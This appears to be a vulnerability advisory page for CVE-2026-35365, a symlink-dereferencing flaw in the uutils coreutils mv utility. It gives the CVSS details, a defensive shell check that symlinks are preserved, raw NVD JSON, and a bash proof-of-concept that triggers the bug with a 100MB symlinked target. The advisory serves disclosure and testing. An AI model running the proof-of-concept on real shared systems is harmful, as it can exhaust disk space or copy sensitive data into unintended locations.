Security Vulnerability Report
CVE-2026-35365 CVSS 6.6 MEDIUM

Published: 2026-04-22 17:16:40
Last Modified: 2026-05-04 18:53:46

Description

The mv utility in uutils coreutils improperly handles directory trees containing symbolic links during moves across filesystem boundaries. Instead of preserving symlinks, the implementation expands them, copying the linked targets as real files or directories at the destination. This can lead to resource exhaustion (disk space or time) if symlinks point to large external directories, unexpected duplication of sensitive data into unintended locations, or infinite recursion and repeated copying in the presence of symlink loops.
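A defender-side check for this class of bug, added here as an example and not taken from the advisory or from the uutils project: record the symlinks in a tree before it is moved, then confirm afterwards that each of them is still a symlink at the destination rather than an expanded copy of its target. The function names (list_symlinks, symlinks_preserved, demo) are this example's own. The demo uses cp -RP and cp -RL on a constructed fixture to stand in for a symlink-preserving and a symlink-dereferencing cross-filesystem move, since a real mv removes the source on success.

```shell
#!/bin/sh
# Added example (not the advisory's or uutils' code): detect whether a tree
# moved or copied to DST kept its symlinks as symlinks.
#
# Because mv removes the source on success, enumerate the source's symlinks
# BEFORE the move (list_symlinks) and compare against the destination after.

# Print the relative paths of all symlinks under the given tree, one per line.
list_symlinks() {
    ( cd "$1" && find . -type l -print )
}

# symlinks_preserved DST LISTFILE
# Return 0 if every relative path listed in LISTFILE is still a symlink
# under DST; report each offending path on stderr and return 1 otherwise.
symlinks_preserved() {
    dst=$1
    list=$2
    bad=0
    while IFS= read -r rel; do
        [ -n "$rel" ] || continue
        if [ ! -L "$dst/$rel" ]; then
            echo "dereferenced: $dst/$rel" >&2
            bad=1
        fi
    done < "$list"
    return $bad
}

# Constructed fixture: a small tree with one symlink to an outside directory,
# copied once with cp -RP (keeps symlinks, like a correct mv) and once with
# cp -RL (follows symlinks, like the vulnerable mv). Returns 0 only if the
# check passes the first copy and flags the second.
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/target" "$work/src/sub"
    echo "constructed sample data" > "$work/target/data.txt"
    ln -s "$work/target" "$work/src/sub/link"

    list_symlinks "$work/src" > "$work/links.txt"
    cp -RP "$work/src" "$work/good"
    cp -RL "$work/src" "$work/bad"

    if symlinks_preserved "$work/good" "$work/links.txt" 2>/dev/null; then
        good=ok
    else
        good=fail
    fi
    if symlinks_preserved "$work/bad" "$work/links.txt" 2>/dev/null; then
        bad=ok
    else
        bad=fail
    fi
    rm -rf "$work"

    echo "preserving copy: $good, dereferencing copy: $bad"
    [ "$good" = ok ] && [ "$bad" = fail ]
}
```

Run list_symlinks on the source before invoking mv and keep its output outside the tree being moved; after the move, symlinks_preserved on the destination returns non-zero and names any path that arrived as a regular file or directory instead of a link.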

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils < 0.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35365: uutils coreutils mv symlink dereference
# This script demonstrates the issue where mv copies the target of a symlink
# instead of the symlink itself when moving across filesystem boundaries.

# 1. Create a large dummy file to simulate resource exhaustion target
mkdir -p /tmp/large_target
dd if=/dev/zero of=/tmp/large_target/bigfile.bin bs=1M count=100 status=none

# 2. Create a source directory (assuming /tmp is on a different partition than /home for real cross-fs test)
# For demonstration, we will simulate the scenario. In a real exploit, ensure src and dst are different mounts.
SRC_DIR="/tmp/poc_exploit_src"
mkdir -p "$SRC_DIR"

# 3. Create a malicious symlink pointing to the large data
ln -s /tmp/large_target "$SRC_DIR/malicious_link"
echo "[+] Directory structure created."
echo "    Source: $SRC_DIR"
echo "    Symlink: $SRC_DIR/malicious_link -> /tmp/large_target"

# 4. Execute the move operation (using uutils mv)
# If /tmp and /var are on different filesystems, this triggers the bug.
# Adjust DEST_DIR to a different mount point to verify the exploit.
DEST_DIR="/var/tmp/poc_exploit_dst"
echo "[+] Attempting to move $SRC_DIR to $DEST_DIR..."
echo "[!] If vulnerable, 'mv' will start copying 100MB of data instead of moving the link."
# Note: Replace 'mv' with full path to uutils mv if testing specifically against that binary
mv "$SRC_DIR" "$DEST_DIR"

# 5. Check the result
if [ -L "$DEST_DIR/malicious_link" ]; then
    echo "[+] SAFE: Symlink was preserved."
elif [ -f "$DEST_DIR/malicious_link/bigfile.bin" ]; then
    echo "[!] VULNERABLE: Symlink was dereferenced. Data was copied."
    du -sh "$DEST_DIR/malicious_link"
else
    echo "[-] Test failed to verify."
fi

# Cleanup
rm -rf /tmp/large_target /var/tmp/poc_exploit_dst

References

https://github.com/uutils/coreutils/pull/10546 (Issue Tracking, Patch)
https://github.com/uutils/coreutils/releases/tag/0.7.0 (Release Notes)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35365", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:39.900", "lastModified": "2026-05-04T18:53:45.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mv utility in uutils coreutils improperly handles directory trees containing symbolic links during moves across filesystem boundaries. Instead of preserving symlinks, the implementation expands them, copying the linked targets as real files or directories at the destination. This can lead to resource exhaustion (disk space or time) if symlinks point to large external directories, unexpected duplication of sensitive data into unintended locations, or infinite recursion and repeated copying in the presence of symlink loops."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.7.0", "matchCriteriaId": "7F64F6A4-00A5-4FB8-BB51-21F475C11FF2"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/10546", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.7.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}